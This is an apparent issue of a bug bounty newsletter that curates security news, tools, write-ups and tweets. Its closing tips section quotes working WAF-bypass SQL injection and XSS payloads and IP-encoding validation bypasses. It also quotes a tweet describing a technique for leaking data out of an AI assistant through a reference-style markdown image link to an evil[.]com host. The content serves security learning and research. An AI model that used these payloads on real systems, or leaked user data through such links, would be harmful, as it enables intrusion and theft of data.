- Disclosed.
- Posts
- Disclosed. June 16, 2025: HackerOne Hai Beta, Project Discovery Bounty Templates, and a Hacker Content Call for Writers
Disclosed. June 16, 2025: HackerOne Hai Beta, Project Discovery Bounty Templates, and a Hacker Content Call for Writers
The bug bounty world, curated.
Welcome to Disclosed.

Each week, 3 readers will win a 1-month PentesterLab Pro license, completely free. Refer a friend to the newsletter to enter.
Shout out to this week’s winners (I will email you):
bhavik_kanejiya
sumanthovs062
dexbugger
PentesterLab is one of the best hands-on platforms for learning web security, with real-world vulnerabilities, private labs, and practical exercises trusted by professionals and bug bounty hunters worldwide.
Huge thanks to PentesterLab for sponsoring this giveaway and supporting the Disclosed. community. ❤️

Hey there! Absolutely nothing went down this past week in the world… anyway, let’s dive in.
In This Issue

Opportunity: Join the Hacker Content Team as a Writer [🔗 Tweet]
by @hakluke
Join the Hacker Content team as a blog writer specializing in cybersecurity.
Read the full tweet →
🚨 Hiring a new blog writer!
I'm looking for someone who is a great cybersecurity all-rounder with excellent native-level english literacy skills to join the @hacker_content team as a blog writer.
Is that you? 👀
Fill out the form linked in the comments!
— Luke Stephens (hakluke) (@hakluke)
12:10 AM • Jun 11, 2025
Celebrating H16102 Award Winners [🔗 Tweet]
by HackerOne
Congratulations to the winners of various hacker awards at the Sydney Live Hacking Event, recognizing their significant contributions and collaborations.
Read more →
Congrats to these award winners for their innovation, collaboration, and relentless pursuit of impact.
🔥 Most Valuable Hacker | Top Criticality, Community, & Consistency of the event
>>WINNER: shubs🕷️ Exterminator | Best/most Impactful bug of the event
>>WINNERS:— HackerOne (@Hacker0x01)
8:23 PM • Jun 12, 2025
Bug Bounty Village Teases Something [🔗 Tweet]
by BugBountyDEFCON
👀
Read more →
Have something you want to Spotlight? Tell me.

Join the Beta for Hai: AI Security Agent for Hackers [🔗 Tweet]
by Jobert Abma
Participate in the beta testing for Hai, an AI-powered security agent tailored for hackers, with a limited number of spots available.
Read more →
Hey hackers! We're running a beta for Hai for Hackers, our AI security agent. If you're interested, please reply with your HackerOne username (we will probably limit to ~100 hackers for now). After it's been enabled, you can start using it by clicking the Hai button in the top
— Jobert Abma (@jobertabma)
9:59 AM • Jun 11, 2025
Template Bounty Program [🔗 Blog]
by PDiscoveryIO
ProjectDiscovery has launched the Template Bounty Program, allowing community members to earn rewards for contributing valuable security templates. It’s a chance to support open-source efforts and gain recognition.
Read more →
Did I miss an important update? Tell me.

New Features in v5.8 of GAP Burp Extension Released [🔗 Tool]
by / XNL -н4cĸ3r
Version 5.8 of the GAP Burp Extension introduces enhancements to parameter lists and links discovery using modern JavaScript techniques.
Read more →
v5.8 of GAP Burp Extension is available:
✅ Improve the quality of the parameter list
✅ Find extra links from fetch and JQuery-like methods#BugBounty
🤘— / XNL -н4cĸ3r (and @xnl-h4ck3r in the new Sky) (@xnl_h4ck3r)
11:28 PM • Jun 12, 2025
GitHub - Isira-Adithy/XSSpecter [📁 Tool]
By Isira-Adithy
XSSpecter is a modular toolkit for ethically testing Blind Cross-Site Scripting (XSS) vulnerabilities, featuring a CLI for automated payload spraying and a server for callback handling with a web dashboard.
Read more →

GitHub - RevoltSecurities/ZoomeyeSearch [📁 Tool]
by RevoltSecurities
ZoomeyeSearch is a command-line tool that leverages the ZoomEye search engine to assist in gathering intelligence on exposed services with extensive filtering and output options.
View the tool →
GitHub - Moopinger/smugglefuzz: [📁 Tool]
by Moopinger
SmuggleFuzz is a configurable HTTP scanner for identifying downgrade smuggling vulnerabilities, offering customizable scanning commands and detailed documentation for effective use.
View the tool →
Introducing SubWatch: Automated Subdomain Monitoring Tool [🔗 Tweet]
by Brut 🇮🇳
SubWatch automates subdomain monitoring with scheduled scans and alerts, aiding bug bounty hunters in their reconnaissance efforts.
Read more →
Have a favorite tool? Tell me.

Dependency Confusion Exploit Leads to RCE on Netflix [🔗 Blog]
by Lupin
A dependency confusion vulnerability discovered during collaboration between Assetnote and Depi results in remote code execution on Netflix.
Read the full blog →

Inside a Massive Healthcare Auth Bypass [🔗 Blog]
by Mayur Pandya
Security researchers uncovered a critical flaw in a healthcare platform that allowed them to hijack over 2,000 tenant accounts by manipulating authentication methods and exploiting poorly implemented SAML logic, all without user interaction.
Read the full blog →
Did I miss an important update? Tell me.

New Features Now Available in my Bug Bounty Hunting Framework | Beta Launch @ DEFCON 33 [🎥 Video]
by rs0n_live
Explore the new features of the Arson Framework version two, launching as an open beta at DEFCON 33, aimed at enhancing bug bounty hunting workflows.
Watch video →
Exploring AI Vulnerabilities and Payout Insights [🔗 Tweet]
by Critical Thinking - Bug Bounty Podcast
This podcast episode concludes a series on AI vulnerabilities, discussing the underlying thought processes and associated payouts.
Read more →
Episode 126 is out!
Vulnus Ex Machina - part 3:
We wrap up @rez0__'s AI miniseries, showcasing AI vulns, thought process and how much they paid out!— Critical Thinking - Bug Bounty Podcast (@ctbbpodcast)
10:05 AM • Jun 12, 2025
Exploiting Cache Server Normalization for Web Cache Deception | PortSwigger Lab | Explained [🎥 Video]
by Medusa
Learn how to exploit web cache deception vulnerabilities through cache server normalization, with practical techniques using Burp Suite.
Watch video →
How I Find High-Value Bug Bounty Leads (2025) [🎥 Video]
by Ergosum
Discover effective strategies for identifying high-value bug bounty leads, focusing on manual reconnaissance and exploration techniques.
Watch video →
CyberHub: Bug Bounty for Beginners, First Bug to High Impact with Soufian El Habti [🎥 Video]
by cyberhub
Soufian El Habti shares practical insights into starting with bug bounty programs and navigating the cybersecurity landscape effectively.
Watch video →
Did I miss something? Tell me.

Harnessing Wayback Machine, web-archive recon | YesWeHack [📓 Blog]
by YesWeHack
Explore the use of web archives for reconnaissance in bug bounty hunting, emphasizing techniques for analyzing archived data.
Read more →

Server-Side Template Injection (SSTI): Exploitation Guide [📓 Blog]
by Intigriti
This guide provides a thorough understanding of SSTI vulnerabilities, offering insights into their exploitation and methods for bypassing protections.
Read more →
Dependency Confusion · Learn my offensive security tradecraft [📓 Blog]
by Ghostlulz
This article discusses the vulnerability in package managers that allows attackers to exploit naming overlaps for remote code execution.
Read more →
The Most Underrated 0-Click Account Takeover Using Punycode IDN Homograph Attacks [📓 Blog]
by coffinxp
This article examines IDN Homograph Attacks where similar-looking characters can lead to account takeovers, emphasizing the need for better security measures.
Read more →
Exploring the Controversial End of Bug Bounty Programs [🔗 Tweet]
by Joseph Thacker (rez0)
This blog post discusses varying perspectives on the future of bug bounty programs, sparking contemplations within the community.
Read more →
I Fooled the Filters: Homoglyph Username Bypass Vulnerability — An Overlooked Threat in Major Platforms [📓 Blog]
by Aman Bhuiyan
The post highlights how visually similar Unicode characters exploit username restrictions on major platforms, detailing risks and responses from companies.
Read more →
Did I miss something? Tell me.

Encoding Techniques to Bypass IP Validation [🔗 Tweet]
by André Baptista
Review various encoding methods for IP addresses that may bypass validation checks, including decimal and hexadecimal examples.
Read more →
10 ways to encode IPs to bypass validations 👇
8.8.1028 → Partial Decimal (Class B)
Combines the 3rd and 4th octets: 4 × 256 + 4 = 10288.525316 → Partial Decimal (Class A)
Combines the last three octets into one decimal number0x08.8.004.004 → Mixed Encoding
Hexadecimal +— André Baptista (@0xacb)
5:08 PM • Jun 10, 2025
Using Param Miner for Effective Cache Busting in Burp Suite [🔗 Tweet]
by sw33tLie
Learn how to use the $randomplz variable in Burp Suite's Param Miner for effective cache busting to improve testing efficiency.
Read more →
I don't know who needs to hear this, but if you have Param Miner installed in Burp Suite, you can use $randomplz anywhere (repeater, etc) to get a random value that can be useful as a cache buster #bugbounty
— sw33tLie (@sw33tLie)
12:38 PM • Jun 14, 2025
Changing User-Agent Header with cURL for Bypassing Filters [🔗 Tweet]
by HackingHub
Learn how to modify the User-Agent header using cURL to aid in bypassing filters or evading bot detection.
Read more →
How to change the User-Agent header from the terminal using cURL 👇
Option: -A, --user-agent <name> Send User-Agent <name> to server
Useful for bypassing filters or evading basic bot detection.
To check your user-agent header, just use: curl httpbin.org/user-agent.
— HackingHub (@hackinghub_io)
1:02 AM • Jun 11, 2025
Using Interactsh as an Alternative to Burp Suite Pro [🔗 Tweet]
by Coffin
Explore Interactsh, a user-friendly alternative for security testing compared to Burp Suite Pro.
Read more →
If you don’t have Burp Suite Pro, you can use the Interactsh client instead. it works just as well and is much easier to use.
— Coffin (@coffinxp7)
10:30 AM • Jun 13, 2025
Quick Subdomain Profiling Technique Shared [🔗 Tweet]
by bugcrowd
Discover a recommended method for profiling subdomains effectively, with a link to a useful resource.
Read more →
If you want to quickly profile subdomains, try this 👇
— bugcrowd (@Bugcrowd)
6:21 PM • Jun 12, 2025
Bypassing Cloudflare 403 for Time-Based Blind SQL Injection [🔗 Tweet]
by N$
Technique to bypass Cloudflare's 403 errors for executing time-based blind SQL injection exploits with specific payload examples.
Read more →
Cloudflare 403 bypass to time-based blind SQLi:
PL: (select(0)from(select(sleep(10)))v) → 403
but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi
#BugBounty#SQLi— N$ (@nav1n0x)
11:47 PM • Jun 13, 2025
Exploring Encoding Variants for XSS Payloads [🔗 Tweet]
by Anton
Check various encoding types for XSS payloads, as filters may block certain characters but not their Unicode versions, enhancing exploitation possibilities.
Read more →
Bug Bounty Tip
Always check different encodings for your XSS payload.
For example:
?q=<img src onerror=alert(1)>
?q=\u003cimg src onerror=alert(1)\u003eThere might be a filter that removes <>,
but not unicode symbols \u003c \u003e— Anton (@therceman)
4:47 PM • Jun 14, 2025
AI Technique Reveals Sensitive Info in Markdown Images [🔗 Tweet]
by Joseph Thacker
Discover a novel technique that exposes sensitive information in images through reference style Markdown links.
Read more →
aim security found a typical AI markdown image sensitive info leak BUT they used a really cool technique i havent seen yet:
REFERENCE STYLE MARKDOWN
It's so cool! You can do ref style links in md. Check it out:
[text][ref]
[ref]: evil[.]com?dataand that WASNT stripped.
— Joseph Thacker (@rez0__)
6:15 PM • Jun 11, 2025
Rediscover Key Bug Bounty Write-Ups from Top Hackers [🔗 Tweet]
by Intigriti
Explore compelling write-ups from skilled hackers that provide valuable insights into web security.
Read more →
Want to dive into forgotten bug bounty write-ups and blog posts from some of the most notable hackers in our community? 🧐
We promise that you will learn a thing or two about web security! 🤠
In this issue, we feature 5 compelling articles (that are still relevant today) from
— Intigriti (@intigriti)
9:08 AM • Jun 13, 2025
Did I miss something? Tell me.
Did you like this week's drop?Please share feedback. |
Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.